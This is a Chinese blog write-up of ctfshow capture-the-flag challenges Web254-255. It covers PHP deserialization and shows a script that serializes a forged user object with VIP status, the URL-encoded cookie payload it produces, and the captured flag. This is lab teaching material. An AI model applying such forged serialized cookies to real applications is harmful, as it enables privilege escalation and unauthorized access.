ctfshow 反序列化Web254-255

2022/4/17

反序列化

反序列化漏洞的产生主要有以下两个原因:

1. unserialize 函数的参数可控。
2.存在魔法函数。

魔法函数

__construct,__destruct,__call,__callStatic,__get,__set,__isset,__unset,__sleep,__wakeup,__toString,__invoke,__set_state,__clone和__debuginfo等成员函数在PHP中被称为魔法函数。在命名自己的类方法时不能使用这些名称,除非是想使用其魔法函数的功能。

Web254

Playload:

?username=xxxxxx&password=xxxxxx

 

Web255

写一个php文件输出user序列化后的cookie

把题目粘贴到php文件把$isVip的值设置为ture

class ctfShowUser{

    public $username='xxxxxx';

    public $password='xxxxxx';

    public $isVip=ture;



    public function checkVip(){

        return $this->isVip;

    }

    public function login($u,$p){

        return $this->username===$u&&$this->password===$p;

    }

    public function vipOneKeyGetFlag(){

        if($this->isVip){

            global $flag;

            echo "your flag is ".$flag;

        }else{

            echo "no vip, no flag";

        }

    }

}



echo urlencode (serialize (new ctfShowUser()));

//ctfshow反序列化漏洞web255

?>

 访问发现:

 O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A5%3A%22isVip%22%3Bs%3A4%3A%22ture%22%3B%7D

把这个值填入名为user的cookie

再把xxxxxx传入username和password

执行得到flag:

ctfshow{c0736abc-d51d-4ea5-8e88-c655dbfe5dea}

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值